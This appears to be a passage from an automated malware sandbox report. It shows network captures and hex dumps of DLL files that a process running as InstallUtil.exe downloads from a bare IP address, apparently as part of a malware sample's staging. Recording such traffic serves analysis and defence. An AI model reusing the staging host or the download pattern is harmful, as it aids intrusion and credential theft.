                                                                                                                2024-10-08 02:59:56 UTC16384INData Raw: 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc
                                                                                                                Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]E
                                                                                                                2024-10-08 02:59:56 UTC16384INData Raw: f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83
                                                                                                                Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
                                                                                                                2024-10-08 02:59:56 UTC16384INData Raw: 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53
                                                                                                                Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjS
                                                                                                                2024-10-08 02:59:56 UTC16384INData Raw: 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51
                                                                                                                Data Ascii: VE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ
                                                                                                                2024-10-08 02:59:56 UTC16384INData Raw: fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73
                                                                                                                Data Ascii: u;t:]jYMS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s
                                                                                                                2024-10-08 02:59:56 UTC16384INData Raw: cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69
                                                                                                                Data Ascii: UQEVuF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|i
                                                                                                                2024-10-08 02:59:56 UTC16384INData Raw: 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee
                                                                                                                Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                15192.168.2.44975749.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 02:59:57 UTC198OUTGET /softokn3.dll HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:57 UTC261INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 02:59:57 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 257872
                                                                                                                Connection: close
                                                                                                                Last-Modified: Tuesday, 08-Oct-2024 02:59:57 GMT
                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                Accept-Ranges: bytes
                                                                                                                2024-10-08 02:59:57 UTC16123INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00
                                                                                                                Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
                                                                                                                2024-10-08 02:59:57 UTC16384INData Raw: c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0
                                                                                                                Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP|*USWV1E0=(tM1(
                                                                                                                2024-10-08 02:59:58 UTC16384INData Raw: 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf
                                                                                                                Data Ascii: EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
                                                                                                                2024-10-08 02:59:58 UTC16384INData Raw: 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00
                                                                                                                Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
                                                                                                                2024-10-08 02:59:58 UTC16384INData Raw: 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02
                                                                                                                Data Ascii: 0{C!=P=Qt-=Rt=UG{{G|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
                                                                                                                2024-10-08 02:59:58 UTC16384INData Raw: 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00
                                                                                                                Data Ascii: []USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
                                                                                                                2024-10-08 02:59:58 UTC16384INData Raw: 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83
                                                                                                                Data Ascii: u ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$|tu}Z=}]WM}EPVWSut&uGZ
                                                                                                                2024-10-08 02:59:58 UTC16384INData Raw: ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00
                                                                                                                Data Ascii: uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
                                                                                                                2024-10-08 02:59:58 UTC16384INData Raw: 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10
                                                                                                                Data Ascii: ]]USWVu@$xTv4{F4^@KN@P|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
                                                                                                                2024-10-08 02:59:58 UTC16384INData Raw: 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b
                                                                                                                Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                16192.168.2.44976449.12.106.2144437648C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-10-08 02:59:59 UTC202OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                Host: 49.12.106.214
                                                                                                                Connection: Keep-Alive
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-10-08 02:59:59 UTC260INHTTP/1.1 200 OK
                                                                                                                Server: nginx
                                                                                                                Date: Tue, 08 Oct 2024 02:59:59 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 80880
                                                                                                                Connection: close
                                                                                                                Last-Modified: Tuesday, 08-Oct-2024 02:59:59 GMT
                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                Accept-Ranges: bytes
                                                                                                                2024-10-08 02:59:59 UTC16124INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22
                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"
                                                                                                                2024-10-08 02:59:59 UTC16384INData Raw: f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b
                                                                                                                Data Ascii: t3MNB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;
